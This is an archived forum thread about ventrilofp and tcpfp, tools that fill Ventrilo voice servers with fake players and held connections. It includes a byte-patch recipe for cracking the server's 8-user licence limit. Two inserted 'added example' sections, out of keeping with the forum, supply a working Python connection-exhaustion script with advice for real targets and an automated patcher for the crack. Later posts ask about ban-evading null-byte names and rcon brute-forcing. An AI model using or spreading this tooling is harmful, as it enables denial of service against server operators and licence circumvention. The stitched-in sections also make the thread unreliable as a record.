Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 34 posts ]  Go to page 1, 2  Next
 Post subject: VentriloFP
PostPosted: 15 Nov 2007 10:02 

Joined: 28 Aug 2007 00:08
Posts: 2
Ventrilo 3.0.0 just came out, any possibilities of a new FP for it?


 Post subject:
PostPosted: 15 Nov 2007 10:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Seems that you and trancemode have had the same idea at the same time (6 minutes of difference) 8-)
I'll go and check this new version and what has changed from 2.x


 Post subject:
PostPosted: 15 Nov 2007 13:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Ok, I have quickly tested the new 3.0 version.
The main things I have noticed are an additional handshake and layer of encryption and a small modification of the protocol.
Then it seems that it doesn't work in LAN; in fact it seems to use a sort of authentication with the Ventrilo master servers... strange.

For the moment I have modified my ventrilofp a bit, adding the 3.0.0 protocol, but naturally the protocol has not been fully implemented, so if you want to test it you can, but it doesn't work:

aluigi.org/beta/ventrilofp.zip


 Post subject:
PostPosted: 16 Nov 2007 22:39 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Anyway remember that Ventrilo uses TCP connections so my tcpfp tool can do its work here too:

tcpfp 127.0.0.1 3784

It is also possible to use the -m NUM option to specify a limit on the connections, but it is not needed.
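
As an added example (not code from this post, and not aluigi's tcpfp, whose internals are not shown in the thread), the following Python reimplements what the `tcpfp 127.0.0.1 3784` invocation above does: it opens many TCP connections to a port and keeps them open, stopping as soon as the target stops accepting. The function names (`hold_connections`, `release`, `demo_local`) are my own; `demo_local` starts a throwaway listener on 127.0.0.1 so the script runs offline.

```python
# Added example: a minimal tcpfp-style "connection slot filler".
# Not the original tool; hold_connections / release / demo_local are my own names.
import socket
import threading


def hold_connections(host, port, count, timeout=3.0):
    """Open up to `count` TCP connections to host:port and keep them open.

    Returns the list of connected sockets. Stops early when the target stops
    accepting (refused or timed out), which is the signal that its connection
    slots are exhausted. `count` plays the role of tcpfp's -m NUM limit.
    """
    held = []
    for _ in range(count):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:            # ECONNREFUSED, timeout, no route, ...
            s.close()
            break
        held.append(s)
    return held


def release(sockets):
    """Close every socket we hold (the server then frees the slots)."""
    for s in sockets:
        try:
            s.close()
        except OSError:
            pass


def demo_local(count=5):
    """Run the filler against a throwaway local listener.

    Returns (connections_held, connections_accepted_by_listener).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))     # port 0 = let the OS pick a free port
    srv.listen(count)
    port = srv.getsockname()[1]
    accepted = []

    def acceptor():
        srv.settimeout(2.0)
        try:
            for _ in range(count):
                conn, _addr = srv.accept()
                accepted.append(conn)
        except socket.timeout:
            pass

    t = threading.Thread(target=acceptor, daemon=True)
    t.start()
    held = hold_connections("127.0.0.1", port, count)
    t.join()
    result = (len(held), len(accepted))
    release(held)
    release(accepted)
    srv.close()
    return result


if __name__ == "__main__":
    print(demo_local(5))
```

Against a real target you would call `hold_connections(host, port, count)` directly and keep the returned sockets alive for as long as the test should last; the early break on a refused or timed-out connect is the practical indicator that the server's socket slots are full, which is exactly the condition the post is after.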


 Post subject:
PostPosted: 28 Nov 2007 06:00 

Joined: 17 Oct 2007 08:10
Posts: 31
Location: South Carolina
Also along the lines of Ventrilo 3, would there be any possibility of a cracked version allowing more than 8 users?


 Post subject:
PostPosted: 28 Nov 2007 11:58 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
If I'm not mistaken (if I remember well, I already looked into this thing out of curiosity in the past) the limitation is hardcoded in the executable.
I mean that there is not a simple check like "if players greater than 8 then quit", but ALL the buffers and structures are limited to 8 players, which means that a "#define MAX_PLAYERS 8" in the source code is transformed into many differences and less memory allocated in the final executable.


 Post subject:
PostPosted: 28 Nov 2007 21:02 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
Hmm, so does tcpfp work on it?
And about the limitation... basically the whole program is built for 8? If you even manage to add more than that, then it simply doesn't work or crashes?
...I had an older Ventrilo, but it seemed crap :S


 Post subject:
PostPosted: 28 Nov 2007 23:08 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
It crashes because it tries to access memory past the 8th player, which is not available.


 Post subject:
PostPosted: 29 Nov 2007 19:45 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
Yeah, that's what I meant. If you manage to get 9 or more then it crashes... and to prevent that you basically have to rewrite the whole thing?!


 Post subject:
PostPosted: 29 Nov 2007 20:59 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
You need to increase the size of the buffers, which can be problematic for global buffers (since where one ends there is other stuff, so if you want to increase the buffer you must change its location and every place where it's referenced) and for stack buffers too (since the function can have multiple RETs and other checks).


 Post subject:
PostPosted: 05 Dec 2007 00:41 

Joined: 28 Aug 2007 00:08
Posts: 2
I'm still having a bit of trouble with the Ventrilo 3.0 protocols; I can't seem to get anything to work. Any suggestions?


 Post subject:
PostPosted: 05 Dec 2007 12:01 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
What type of error do you receive?
The centralized authorization mechanism has not been implemented yet, so for the moment it is only possible to physically fill the sockets, but not the player slots.


 Post subject:
PostPosted: 01 Feb 2008 22:28 

Joined: 01 Feb 2008 22:19
Posts: 4
aluigi wrote:
If I'm not mistaken (if I remember well, I already looked into this thing out of curiosity in the past) the limitation is hardcoded in the executable.
I mean that there is not a simple check like "if players greater than 8 then quit", but ALL the buffers and structures are limited to 8 players, which means that a "#define MAX_PLAYERS 8" in the source code is transformed into many differences and less memory allocated in the final executable.


Hi Luigi ;)

Well, you are right. The 8 users are hardcoded.
There are about 6 places where the hardcoded size is used.
Also the user infos are some static aligned struct.

Here is some howto if one wants to test around with more than just 8 users.
I moved it to some unused area to get a 512 users limit.


Code:

Ventrilo v2.3.1 Linux
--------------------------


remap:
- 'ventrilo_srv.prop',0    08174DF8  ->  08174A0A   (replace 3 times F84D1708 with 0A4A1708)
- one useless '%s'         081751F8  ->  081749F4   (replace 1 time  F8511708 with F4491708)

  old usertable area     ->    new usertable area       |   replace all        with
                                                        |
  081960C8                     08174A20  start          |    C8601908     -> 204A1708
  081960CC                     08174A24  entry_1        |    CC601908     -> 244A1708
  081960E8                     081755F4  end            |    E8601908     -> F4551708
  081960EC                     081755F8  num_clients    |    EC601908     -> F8551708

=> 0x2F5 users!  limited to 0x200  (for checking with 3-byte opcode  "cmp dh,01")



   replacing              with
----------------      -------------
  CMP EDX, 08h    ->    CMP DH, 02h


[83 FA 08] 7D 0E 8B 08           replace with 80 FE 02
[83 FA 08] 7C F2 33 C0           replace with 80 FE 02
8B 15 EC 60 19 08 [83 FA 08]     replace with 80 FE 02
8B 15 EC 60 19 08 [83 FA 09]     replace with 80 FE 02

8B 15 EC 60 19 08 [83 FA 08] 0F 8E C9 00 00 00  => CMP DH, 01h!!   replace with  80 FE 01
8A 80 79 01 00 00 84 C0 74 01 [47]              => INC EDX (47) -> NOP (90)


I also started with Ventrilo 3.0.2, but it is crashing when a user disconnects.
Well, ok. I just looked at the disassembled code and tried to remap the area
like I did in the old version.
But when it didn't work on the first try, I stopped further analysis.
It's for sure just some small stupid mistake.

Maybe some other person is interested in analyzing and patching the code.

Code:


Ventrilo v3.0.2 Linux
--------------------------

function:  [?]

.text:0804EA97 83 FA 08    cmp     edx, 8
[83 FA 08] 7D 0E 8B 08        -> 80 FE 02

.text:0804EAA5 83 FA 08    cmp     edx, 8
89 48 FC 83 C0 04 [83 FA 08]  -> 80 FE 02



function: ServerConnAccept

.text:0804E923  83 FA 09   cmp     edx, 9
8B 15 E8 98 1B 08 [83 FA 09] 7C 3E -> 80 FE 02



function: check_server_limits

.text:0804EA3C 83 FA 08    cmp     edx, 8
8B 15 E8 98 1B 08 [83 FA 08]  -> 80 FE 02

.text:0804EA4E 83 FA 09    cmp     edx, 9
8B 15 E8 98 1B 08 [83 FA 09] 7C 05 -> 80 FE 02


add segment:
offset 0x30    0x17 -> 0x18  (add one segment)

append to file:
DE000000010000000300000000002008840B07000020000000000000000000000400000000000000
(segment with 0x2000 bytes data starting at offset 00070b84)
then append 0x2000 times 0x00

mapping:

.bss:081B98C4  [usertable_start]  -> 08200000   C4981B08 -> 00002008
.bss:081B98C8  [usertable_entry1] -> 08200004   C8981B08 -> 04002008
.bss:081B98E4  [usertable_end]    -> 08201FF8   E4981B08 -> F81F2008
.bss:081B98E8  [num_users]        -> 08201FFC   E8981B08 -> FC1F2008



Of course I discourage you from using a crac*ed version of Ventrilo.
But it might be useful for some errrhm tests :)
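
An added example, in Python, that is not the poster's own tooling (the post only lists byte patterns): a small patcher that understands the notation used in both recipes above, where the bytes in [brackets] are the ones replaced and the surrounding bytes are context that must match. It refuses to patch unless the context occurs exactly once, and rejects a replacement whose length differs from the bracketed span, which is the property every substitution above relies on: `83 FA ib` (cmp edx, imm8) and `80 FE ib` (cmp dh, imm8) are both 3 bytes, so swapping one for the other raises the cap to 0x200 without shifting the JL/JGE that follows. The block also decodes the 40-byte record appended in the 3.0.2 recipe: its layout is an Elf32_Shdr (sh_addr 0x08200000, sh_offset 0x70B84, sh_size 0x2000), i.e. a section header, and offset 0x30 of the ELF32 header is e_shnum. One caveat a practitioner should keep in mind: the kernel loader maps PT_LOAD program headers, not sections, so whether 0x08200000 is actually mapped at run time depends on the program headers, which the post does not show. `SAMPLE` is a constructed blob for the demo (not a Ventrilo binary) and all function names are my own.

```python
# Added example: byte-pattern patcher for the "[bracketed] -> replacement" notation
# above, plus an Elf32_Shdr decoder and a model of the cmp edx / cmp dh trick.
# Not code from the thread; parse_rule, apply_rule, remap_dword, decode_elf32_shdr,
# jl_taken and demo are my own names; SAMPLE is constructed.
import re
import struct


def parse_rule(pattern, replacement):
    """Parse '8B 15 EC 60 19 08 [83 FA 08]' / '80 FE 02' into
    (context_bytes, offset_of_bracketed_part, bracketed_len, new_bytes).
    Without brackets the whole pattern is the part that gets replaced."""
    m = re.fullmatch(r"\s*([0-9A-Fa-f\s]*)\[([0-9A-Fa-f\s]+)\]([0-9A-Fa-f\s]*)", pattern)
    if m:
        pre, mid, post = (bytes.fromhex(g) for g in m.groups())
    else:
        pre, mid, post = b"", bytes.fromhex(pattern), b""
    new = bytes.fromhex(replacement)
    if len(new) != len(mid):  # a patch must not change the instruction length
        raise ValueError("replacement length differs from bracketed length")
    return pre + mid + post, len(pre), len(mid), new


def find_all(data, needle):
    """All (possibly overlapping) offsets of needle in data."""
    hits, i = [], data.find(needle)
    while i != -1:
        hits.append(i)
        i = data.find(needle, i + 1)
    return hits


def apply_rule(data, pattern, replacement, expect=1):
    """Apply one rule; refuse unless the context matches exactly `expect` times."""
    ctx, off, n, new = parse_rule(pattern, replacement)
    hits = find_all(data, ctx)
    if len(hits) != expect:
        raise ValueError(f"{pattern!r}: {len(hits)} hits, expected {expect}")
    out = bytearray(data)
    for h in hits:
        out[h + off:h + off + n] = new
    return bytes(out)


def remap_dword(data, old_addr, new_addr):
    """Rewrite every little-endian 32-bit reference to old_addr (the 'remap'
    step above: 081960C8 -> 08174A20 is the byte string C8601908 -> 204A1708).
    Returns (patched_data, number_of_references_rewritten)."""
    old, new = struct.pack("<I", old_addr), struct.pack("<I", new_addr)
    hits = find_all(data, old)
    out = bytearray(data)
    for h in hits:
        out[h:h + 4] = new
    return bytes(out), len(hits)


def decode_elf32_shdr(hexstr):
    """Decode a 40-byte little-endian Elf32_Shdr (the layout of the record
    appended in the 3.0.2 recipe, so that record is a section header)."""
    names = ("sh_name", "sh_type", "sh_flags", "sh_addr", "sh_offset",
             "sh_size", "sh_link", "sh_info", "sh_addralign", "sh_entsize")
    raw = bytes.fromhex(hexstr)
    if len(raw) != 40:
        raise ValueError("Elf32_Shdr is 40 bytes")
    return dict(zip(names, struct.unpack("<10I", raw)))


def jl_taken(edx, cmp_bytes):
    """Model the two 3-byte compares: 83 FA ib = cmp edx, imm8 and
    80 FE ib = cmp dh, imm8 (dh is bits 8..15 of edx). Returns True when a
    following JL (7C) would be taken, i.e. the counter is still below the limit.
    edx is treated as a small non-negative count, as in the server."""
    op, modrm, imm = cmp_bytes
    if (op, modrm) == (0x83, 0xFA):
        return edx < imm
    if (op, modrm) == (0x80, 0xFE):
        return ((edx >> 8) & 0xFF) < imm
    raise ValueError("unsupported encoding")


# The record appended in the 3.0.2 recipe, copied from the post.
SHDR_HEX = "DE000000010000000300000000002008840B07000020000000000000000000000400000000000000"

# Constructed sample blob (not a real Ventrilo binary): nop; nop; mov edx,[081960EC];
# cmp edx,8; jl -14; xor eax,eax; nop; then a stray pointer to 081960C8; nop.
SAMPLE = bytes.fromhex("90 90 8B 15 EC 60 19 08 83 FA 08 7C F2 33 C0 90 C8 60 19 08 90")


def demo():
    """Apply one compare patch and one table remap; returns the patched blob."""
    out = apply_rule(SAMPLE, "8B 15 EC 60 19 08 [83 FA 08]", "80 FE 02")
    out, n = remap_dword(out, 0x081960C8, 0x08174A20)
    assert n == 1
    return out


if __name__ == "__main__":
    print(demo().hex(" "))
    print(decode_elf32_shdr(SHDR_HEX))
```

A useful sanity check on the 2.3.1 numbers: (0x081755F4 - 0x08174A20) / 4 = 0x2F5, so the poster's "0x2F5 users" is simply the new table size in 4-byte entries, and the `cmp dh, 2` cap of 0x200 stays below it. Note that `cmp dh, imm8` only inspects bits 8..15, so a count of 0x10000 or more would pass the check again; with a 0x2F5-entry table that can never be reached, but it is the edge case to remember if the same trick is reused elsewhere.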


 Post subject:
PostPosted: 08 Feb 2008 22:29 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the good old Ventrilo... I think I will no longer work on it 8-)


 Post subject:
PostPosted: 26 Feb 2008 03:03 

Joined: 01 Feb 2008 22:19
Posts: 4
Did you investigate the v3 protocol a little?
I'm thinking about doing it.


 Post subject:
PostPosted: 26 Feb 2008 11:24 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
No, I didn't investigate more; I just noticed that ventrilofp worked with this 3.0 too (naturally excluding the centralized authorization mechanism) and so that was enough 8-)


 Post subject:
PostPosted: 09 Mar 2008 00:28 

Joined: 09 Mar 2008 00:25
Posts: 7
So it should still work, right???

j.w 'cause mine doesn't seem to be working

Code:
- target:   192.168.0.192 : 3784
- activated 2.3 protocol
- use default 2.3.0 version

  Player:
- server uses version 3.0.2
- activated 3.x protocol
- set version to 3.0.0

  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8


but no one joins :(


 Post subject:
PostPosted: 09 Mar 2008 00:59 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Without the 3.0 challenge-response algorithm (at the moment I have zero interest in this, so I doubt I will work on it, although I believe it's probably nothing complex) the filling of the server is not complete the way it was in the old 2.x version.
You can only try to fill the available socket slots using tcpfp.


 Post subject:
PostPosted: 28 Mar 2008 22:41 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I did it.
The new version will be released tomorrow, when I finish checking for possible compatibility issues; anyway, for the moment the centralized handshake has been fully emulated and it works perfectly in LAN.


 Post subject:
PostPosted: 29 Mar 2008 14:12 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
version 0.2.4 is out


 Post subject:
PostPosted: 01 Apr 2008 08:09 

Joined: 20 Nov 2007 05:07
Posts: 6
Hey Luigi, I've found a slight bug in the updated ventrilofp. What happens is the program attempts to send connections to the slightly newer servers using version 3.0.2, which don't accept clients using the 3.0.0 version (what you have set for connections to 3.x servers). In case I wasn't clear enough, I've attached a photo.


Attachment: ventriloaluig.JPG (file comment: Ventrilofp.exe incompatibility with 3.0.2 servers.)
 Post subject:
PostPosted: 01 Apr 2008 13:11 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
The error you see in the server is normal; ventrilofp first tries using version 2.3.0 and then switches to 3.x if the server requires it.
The fact that ventrilofp has not been able to join the fake player is caused by something else.
I need to know the exact configuration of the server for replicating the problem.


 Post subject:
PostPosted: 01 Apr 2008 19:15 

Joined: 20 Nov 2007 05:07
Posts: 6
Well, the server was just the default Windows i386 server. I made no alterations to the config. I also tried altering the source of ventrilofp some (which is why you see 3.0.2 instead of 3.x in the picture), but to no avail. Previously the ventrilofp.exe worked just fine (a few days ago), but now, even on unprotected servers that allow duplicate IPs, the players can't connect.


 Post subject:
PostPosted: 02 Apr 2008 15:02 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
OK, bug solved in the new 0.2.5 version; it was a 16-bit value which I set to 3 while it needed to be 1... anyway I have not checked this thing further, so REPORT any other similar problem with other servers!

I have also fixed a memory consumption bug in fastsend and added the possibility to set the phonetic, so when you join a server the other players should hear what you typed there.


 Post subject:
PostPosted: 06 Apr 2008 07:18 

Joined: 06 Apr 2008 07:11
Posts: 2
Code:
- Ventrilo 3 server handshake:
ce 2f b5 f2 cf ca 6d 4e 77 6f 24 da ef d0 62 99   ./....mNwo$...b.

- server full or players_per_IP limit reached or something wrong
- wait to retry:


Any ideas?


Last edited by RiosJoe on 11 Jun 2008 19:59, edited 1 time in total.

 Post subject:
PostPosted: 06 Apr 2008 14:50 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
ok, I have definitely solved this problem in version 0.2.6
For more info check the handshake_num variable in ventrilo3_handshake.c


 Post subject:
PostPosted: 06 Apr 2008 22:37 

Joined: 06 Apr 2008 07:11
Posts: 2
Code:
- Ventrilo 3 server handshake:
e6 72 cc 1c ab 9c 2b b3 1c c2 26 8a 81 bd c9 ad   .r....+...&.....

- server full or players_per_IP limit reached or something wrong
- wait to retry:
  1
  Player: 11/100
- server full or players_per_IP limit reached or something wrong
- wait to retry:


Maybe it's different per server.


Last edited by RiosJoe on 11 Jun 2008 20:00, edited 1 time in total.

 Post subject:
PostPosted: 07 Apr 2008 10:07 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
If you are sure you have not re-downloaded your cache (a common problem), I need to know the exact configuration of the server; otherwise I can't replicate the problem.


 Post subject:
PostPosted: 19 Apr 2008 04:45 

Joined: 09 Apr 2008 08:06
Posts: 66
Location: USA
Is it possible to use a null byte on Ventrilo? Like, for example, you could use a null byte with TeamSpeak and, well, basically it would make it so that if you click on the person's name using the null byte you would get an error. It was pretty interesting and funny, just thought I'd ask. Also, someone either rewrote your code for tspeakfp at one point so that when the fake players connect they would be using the null byte, so it was a lot harder to ban because of the error you would get, or they somehow added it into the name of the fake player, which I'm not sure if they did.


 Post subject:
PostPosted: 19 Apr 2008 08:20 

Joined: 09 Apr 2008 08:06
Posts: 66
Location: USA
Sorry for the double post, but I gotta ask this.

Well, earlier I was messing around with tcpfp and I was using it for Ventrilo. Not sure if you guys know, but if you /status in your rcon while using tcpfp on the server, people can see that you log in about 100 times lol. But I was wondering, is it possible to make ventrilofp somehow brute force rcon with this? Like have it added into ventfp? It seems pretty interesting, not sure if it would work or not, I just thought I'd ask.

